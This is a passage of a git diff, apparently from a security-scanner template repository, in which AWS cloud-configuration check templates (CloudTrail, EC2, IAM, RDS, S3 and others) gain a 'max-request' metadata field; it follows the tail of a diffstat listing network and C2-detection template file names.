+- network/detection/msmq-detect.yaml | 7 ++- network/detection/mysql-detect.yaml | 5 +- network/detection/openssh-detect.yaml | 2 +- network/detection/pgsql-detect.yaml | 5 +- network/detection/pop3-detect.yaml | 5 +- network/detection/proftpd-server-detect.yaml | 5 +- network/detection/rabbitmq-detect.yaml | 5 +- network/detection/rdp-detect.yaml | 5 +- network/detection/redis-detect.yaml | 16 ++++++- network/detection/riak-detect.yaml | 5 +- .../detection/rpcbind-portmapper-detect.yaml | 5 +- network/detection/rsyncd-service-detect.yaml | 2 +- network/detection/rtsp-detect.yaml | 5 +- network/detection/sap-router.yaml | 2 +- network/detection/smtp-detect.yaml | 4 +- network/detection/sshd-dropbear-detect.yaml | 5 +- network/detection/starttls-mail-detect.yaml | 4 +- network/detection/teamspeak3-detect.yaml | 4 +- network/detection/telnet-detect.yaml | 5 +- network/detection/totemomail-smtp-detect.yaml | 4 +- .../vmware-authentication-daemon-detect.yaml | 5 +- network/detection/vnc-service-detect.yaml | 2 +- network/detection/weblogic-iiop-detect.yaml | 2 +- network/detection/weblogic-t3-detect.yaml | 2 +- network/detection/wing-ftp-detect.yaml | 2 +- network/detection/ws_ftp-ssh-detect.yaml | 18 ++++++-- .../detection/xlight-ftp-service-detect.yaml | 5 +- network/enumeration/beanstalk-service.yaml | 5 +- network/enumeration/kafka-topics-list.yaml | 5 +- network/enumeration/mongodb-info-enum.yaml | 5 +- .../enumeration/niagara-fox-info-enum.yaml | 5 +- network/enumeration/psql-user-enum.yaml | 5 +- .../enumeration/smtp/smtp-commands-enum.yaml | 7 ++- network/enumeration/smtp/smtp-user-enum.yaml | 6 +-- network/exposures/cisco-smi-exposure.yaml | 2 +- network/exposures/exposed-adb.yaml | 2 +- network/exposures/exposed-dockerd.yaml | 5 +- network/exposures/exposed-redis.yaml | 2 +- network/exposures/exposed-zookeeper.yaml | 2 +- .../adbhoney-honeypot-cnxn-detect.yaml | 13 +++--- .../adbhoney-honeypot-shell-detect.yaml | 13 +++--- .../conpot-siemens-honeypot-detect.yaml | 10 ++-- .../honeypot/cowrie-ssh-honeypot-detect.yaml | 5 +- .../honeypot/dionaea-ftp-honeypot-detect.yaml | 5 +- .../dionaea-mqtt-honeypot-detect.yaml | 13 +++--- .../dionaea-mysql-honeypot-detect.yaml | 6 +-- .../honeypot/dionaea-smb-honeypot-detect.yaml | 5 +- network/honeypot/gaspot-honeypot-detect.yaml | 5 +- .../honeypot/mailoney-honeypot-detect.yaml | 6 +-- network/honeypot/redis-honeypot-detect.yaml | 9 ++-- network/jarm/c2/cobalt-strike-c2-jarm.yaml | 2 +- network/jarm/c2/covenant-c2-jarm.yaml | 2 +- network/jarm/c2/deimos-c2-jarm.yaml | 2 +- network/jarm/c2/evilginx2-jarm.yaml | 2 +- network/jarm/c2/generic-c2-jarm.yaml | 2 +- network/jarm/c2/grat2-c2-jarm.yaml | 2 +- network/jarm/c2/havoc-c2-jarm.yaml | 2 +- network/jarm/c2/mac-c2-jarm.yaml | 2 +- network/jarm/c2/macshell-c2-jarm.yaml | 2 +- network/jarm/c2/merlin-c2-jarm.yaml | 2 +- network/jarm/c2/metasploit-c2-jarm.yaml | 2 +- network/jarm/c2/mythic-c2-jarm.yaml | 2 +- network/jarm/c2/posh-c2-jarm.yaml | 2 +- network/jarm/c2/shad0w-c2-jarm.yaml | 2 +- network/jarm/c2/silenttrinity-c2-jarm.yaml | 2 +- network/jarm/c2/sliver-c2-jarm.yaml | 2 +- network/misconfig/apache-dubbo-unauth.yaml | 7 ++- .../apache-rocketmq-broker-unauth.yaml | 7 ++- network/misconfig/clamav-unauth.yaml | 5 +- network/misconfig/clickhouse-unauth.yaml | 2 +- network/misconfig/erlang-daemon.yaml | 5 +- .../misconfig/ganglia-xml-grid-monitor.yaml | 2 +- network/misconfig/memcached-stats.yaml | 2 +- network/misconfig/mongodb-unauth.yaml | 5 +- network/misconfig/mysql-native-password.yaml | 2 +- network/misconfig/printers-info-leak.yaml | 7 ++- network/misconfig/sap-router-info-leak.yaml | 2 +- network/misconfig/tidb-native-password.yaml | 2 +- network/misconfig/tidb-unauth.yaml | 2 +- network/misconfig/unauth-psql.yaml | 5 +- .../clockwatch-enterprise-rce.yaml | 2 +- passive/cves/2024/CVE-2024-25723.yaml | 2 +- ssl/c2/sliver-c2.yaml | 2 +- ssl/c2/venomrat.yaml | 2 +- ssl/deprecated-tls.yaml | 5 +- 2476 files changed, 9883 insertions(+), 4859 deletions(-) diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml index 3cae97828a..35bfa57300 100644 --- a/cloud/aws/acm/acm-cert-renewal-30days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml @@ -11,8 +11,9 @@ info: Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml index ea8a5647a5..3298230cc4 100644 --- a/cloud/aws/acm/acm-cert-renewal-45days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml @@ -11,8 +11,9 @@ info: Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml index b66e346a02..68ba508649 100644 --- a/cloud/aws/acm/acm-cert-validation.yaml +++ b/cloud/aws/acm/acm-cert-validation.yaml @@ -11,8 +11,9 @@ info: Use AWS ACM for certificate provisioning and ensure domain validation steps are correctly followed for each certificate issued or renewed. reference: - https://docs.aws.amazon.com/acm/latest/userguide/gs-acm-validate.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml index ef6e896265..7ebaa3dc61 100644 --- a/cloud/aws/acm/acm-wildcard-cert.yaml +++ b/cloud/aws/acm/acm-wildcard-cert.yaml @@ -11,8 +11,9 @@ info: Replace wildcard ACM certificates with single domain name certificates for each domain/subdomain within your AWS account. This enhances security by ensuring each domain/subdomain has its own unique private key and certificate. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml index a1d4fa922d..71672fd4dc 100644 --- a/cloud/aws/aws-code-env.yaml +++ b/cloud/aws/aws-code-env.yaml @@ -7,6 +7,8 @@ info: Checks if AWS CLI is set up and all necessary tools are installed on the environment. reference: - https://aws.amazon.com/cli/ + metadata: + max-request: 2 tags: cloud,devops,aws,amazone,aws-cloud-config variables: diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml index a66f25bb45..f11ba86322 100644 --- a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml @@ -11,8 +11,9 @@ info: Enable data event logging in CloudTrail for S3 buckets to ensure detailed activity monitoring and logging for better security and compliance. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-data-events-with-cloudtrail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml index 2c279064b7..0a71fc88a0 100644 --- a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml @@ -11,8 +11,9 @@ info: Enable CloudTrail in all AWS regions through the AWS Management Console or CLI to ensure comprehensive activity logging and monitoring. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml index f33fbb19fd..82cdf1b73c 100644 --- a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml @@ -11,8 +11,9 @@ info: Configure only one multi-region trail to log global service events and disable global service logging for all other trails. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml index 51a2568a98..f611b53de0 100644 --- a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml @@ -11,8 +11,9 @@ info: Enable global service logging in CloudTrail by creating or updating a trail to include global services. This ensures comprehensive activity monitoring. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml index cdb9e2d23c..8afe78e695 100644 --- a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml @@ -11,8 +11,9 @@ info: Enable CloudTrail log file validation and configure CloudWatch Logs to monitor CloudTrail log files. Create CloudWatch Alarms for specific events of interest. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/send-cloudtrail-events-to-cloudwatch-logs.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,cloudwatch,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml index 7feef84f70..0de14fa413 100644 --- a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml @@ -11,8 +11,9 @@ info: Enable log file integrity validation on all CloudTrail trails to ensure the integrity and authenticity of your logs. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 84ca11eca2..2db0fdd6c5 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -11,8 +11,9 @@ info: Enable Server-Side Encryption (SSE) for CloudTrail logs using an AWS KMS key through the CloudTrail console or AWS CLI. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml index 4cae24dead..85305d7410 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml @@ -11,8 +11,9 @@ info: Enable MFA Delete on CloudTrail buckets via the S3 console or AWS CLI. reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/MultiFactorAuthenticationDelete.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml index d206f2aed3..87ed17a9c4 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml @@ -11,9 +11,9 @@ info: Enable management event logging in CloudTrail by creating a new trail or updating existing trails to include management events. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-and-data-events-with-cloudtrail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml index 6a8584340e..d38f83bbb9 100644 --- a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml @@ -11,8 +11,9 @@ info: Restrict S3 bucket access using bucket policies or IAM policies to ensure that CloudTrail logs are not publicly accessible. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml index ef93d42d16..c8d1d37749 100644 --- a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml @@ -11,8 +11,9 @@ info: Enable Server Access Logging on the S3 bucket used by CloudTrail. Configure the logging feature to capture all requests made to the CloudTrail bucket. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml index eea6307c9b..ff7ca0f378 100644 --- a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml +++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml @@ -11,8 +11,9 @@ info: Enable S3 Object Lock in Governance mode with a retention period that meets your compliance requirements for CloudTrail S3 buckets. reference: - https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml index 5d5a969bd9..37ba76c60e 100644 --- a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml +++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml @@ -11,8 +11,9 @@ info: Configure at least one action for each CloudWatch alarm to ensure timely response to monitored issues. reference: - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml index d3d3bf23e9..e46968007b 100644 --- a/cloud/aws/cloudwatch/cw-alarms-actions.yaml +++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml @@ -11,8 +11,9 @@ info: Enable actions for each CloudWatch alarm by setting the ActionEnabled parameter to true, allowing for automated responses to alarms. reference: - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml index d10f792c17..00550b5c9c 100644 --- a/cloud/aws/ec2/ec2-imdsv2.yaml +++ b/cloud/aws/ec2/ec2-imdsv2.yaml @@ -11,9 +11,9 @@ info: Modify the EC2 instance metadata options to set `HttpTokens` to `required`, enforcing the use of IMDSv2. This can be done via the AWS Management Console, CLI, or EC2 API. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml index 97edc1e31d..90676c0e77 100644 --- a/cloud/aws/ec2/ec2-public-ip.yaml +++ b/cloud/aws/ec2/ec2-public-ip.yaml @@ -11,8 +11,9 @@ info: Restrict public IP assignment for EC2 instances, particularly for backend instances. Use private IPs and manage access via AWS VPC and security groups. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml index 77bbec7c2d..caeb3f76be 100644 --- a/cloud/aws/ec2/ec2-sg-egress-open.yaml +++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml @@ -11,8 +11,9 @@ info: Restrict egress traffic in EC2 security groups to only necessary IP addresses and ranges, adhering to the Principle of Least Privilege. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html#sg-rules + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml index 5734057e9b..e24dbebbb3 100644 --- a/cloud/aws/ec2/ec2-sg-ingress.yaml +++ b/cloud/aws/ec2/ec2-sg-ingress.yaml @@ -11,8 +11,9 @@ info: Restrict access to uncommon ports in EC2 security groups, permitting only necessary traffic and implementing stringent access controls. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml index f371872c2f..4605660d0b 100644 --- a/cloud/aws/ec2/publicly-shared-ami.yaml +++ b/cloud/aws/ec2/publicly-shared-ami.yaml @@ -11,8 +11,9 @@ info: Restrict AMI sharing to specific, trusted AWS accounts and ensure they are not publicly accessible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ami,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml index 07452176fe..1a47dfc0e8 100644 --- a/cloud/aws/ec2/unencrypted-aws-ami.yaml +++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml @@ -11,8 +11,9 @@ info: Encrypt your AMIs using AWS managed keys or customer-managed keys in the AWS Key Management Service (KMS) to ensure data security. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIEncryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml index e48897a0c8..20266828a5 100644 --- a/cloud/aws/iam/iam-full-admin-privileges.yaml +++ b/cloud/aws/iam/iam-full-admin-privileges.yaml @@ -7,6 +7,8 @@ info: Verifies that no Amazon IAM policies grant full administrative privileges, ensuring adherence to the Principle of Least Privilege reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy-version.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml index e8525012ee..b9fdb47c3c 100644 --- a/cloud/aws/iam/iam-key-rotation-90days.yaml +++ b/cloud/aws/iam/iam-key-rotation-90days.yaml @@ -7,6 +7,8 @@ info: Checks if IAM user access keys are rotated every 90 days to minimize accidental exposures and unauthorized access risks reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-access-keys.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml index 5d649f479c..42e9a22c2b 100644 --- a/cloud/aws/iam/iam-mfa-enable.yaml +++ b/cloud/aws/iam/iam-mfa-enable.yaml @@ -7,6 +7,8 @@ info: Verifies that Multi-Factor Authentication (MFA) is enabled for all IAM users with console access in AWS reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-mfa-devices.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml index ca9e3a8066..85e10011ea 100644 --- a/cloud/aws/iam/iam-ssh-keys-rotation.yaml +++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml @@ -7,6 +7,8 @@ info: Verifies that IAM SSH public keys are rotated every 90 days, enhancing security and preventing unauthorized access to AWS CodeCommit repositories reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-ssh-public-keys.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,ssh,aws-cloud-config flow: | diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml index bfefd94533..15ef5f8b30 100644 --- a/cloud/aws/rds/aurora-copy-tags-snap.yaml +++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml @@ -11,8 +11,9 @@ info: Enable Copy Tags to Snapshots for Aurora clusters via the AWS Management Console or modify the DB cluster to include this feature using AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_Tagging.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml index c7ae76d4fb..8927aab0c9 100644 --- a/cloud/aws/rds/aurora-delete-protect.yaml +++ b/cloud/aws/rds/aurora-delete-protect.yaml @@ -11,8 +11,9 @@ info: Enable Deletion Protection by modifying the Aurora cluster settings in the AWS Management Console or via the AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/DBInstanceDeletionProtection.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml index c76c5618b5..d556f68ca4 100644 --- a/cloud/aws/rds/iam-db-auth.yaml +++ b/cloud/aws/rds/iam-db-auth.yaml @@ -11,8 +11,9 @@ info: Enable IAM Database Authentication for MySQL and PostgreSQL RDS database instances to leverage IAM for secure, token-based access control. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml index 4a61f55d05..61da682f54 100644 --- a/cloud/aws/rds/rds-backup-enable.yaml +++ b/cloud/aws/rds/rds-backup-enable.yaml @@ -11,8 +11,9 @@ info: Enable automated backups for RDS instances by setting the backup retention period to a value other than 0. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml index 9e3cf32f15..884e6d6060 100644 --- a/cloud/aws/rds/rds-deletion-protection.yaml +++ b/cloud/aws/rds/rds-deletion-protection.yaml @@ -11,9 +11,9 @@ info: Enable Deletion Protection for all Amazon RDS instances via the AWS Management Console or using the AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml index 0738c976ec..51ed513f22 100644 --- a/cloud/aws/rds/rds-encryption-check.yaml +++ b/cloud/aws/rds/rds-encryption-check.yaml @@ -11,8 +11,9 @@ info: Enable encryption for your Amazon RDS instances by modifying the instance and setting the "Storage Encrypted" option to true. For new instances, enable encryption within the launch wizard. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml index f352ac58ab..cd47b86696 100644 --- a/cloud/aws/rds/rds-gp-ssd-usage.yaml +++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml @@ -11,8 +11,9 @@ info: Convert RDS instances from Provisioned IOPS to General Purpose SSDs to optimize costs without sacrificing I/O performance for most database workloads. reference: - https://aws.amazon.com/rds/features/storage/ + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml index 6e067db633..dc477abaaa 100644 --- a/cloud/aws/rds/rds-public-snapshot.yaml +++ b/cloud/aws/rds/rds-public-snapshot.yaml @@ -11,8 +11,9 @@ info: Modify the snapshot's visibility settings to ensure it is not public, only shared with specific AWS accounts. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml index 7937f55c6b..ea9594ec42 100644 --- a/cloud/aws/rds/rds-public-subnet.yaml +++ b/cloud/aws/rds/rds-public-subnet.yaml @@ -11,8 +11,9 @@ info: Migrate RDS instances to private subnets within the VPC and ensure proper network ACLs and security group settings are in place to restrict access. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_VPC.WorkingWithRDSInstanceinaVPC.html#USER_VPC.Subnets + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml index 40c1bf2e1a..7a40b2f51c 100644 --- a/cloud/aws/rds/rds-ri-payment-fail.yaml +++ b/cloud/aws/rds/rds-ri-payment-fail.yaml @@ -11,8 +11,9 @@ info: Review the payment methods on file and retry the reservation purchase for RDS instances to secure discounted rates. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithReservedDBInstances.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml index 49f17f0de3..3ad25f6a8f 100644 --- a/cloud/aws/rds/rds-snapshot-encryption.yaml +++ b/cloud/aws/rds/rds-snapshot-encryption.yaml @@ -11,8 +11,9 @@ info: Enable encryption for RDS snapshots by using AWS KMS Customer Master Keys (CMKs) for enhanced data security and compliance. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_EncryptSnapshot.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml index 4d86b97f8f..0bf1a9c79f 100644 --- a/cloud/aws/s3/s3-access-logging.yaml +++ b/cloud/aws/s3/s3-access-logging.yaml @@ -7,6 +7,8 @@ info: This template verifies if the Server Access Logging feature is enabled for Amazon S3 buckets, which is essential for tracking access requests for security and audit purposes. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml index c9a52a4e69..b234528c1f 100644 --- a/cloud/aws/s3/s3-auth-fullcontrol.yaml +++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets grant FULL_CONTROL access to 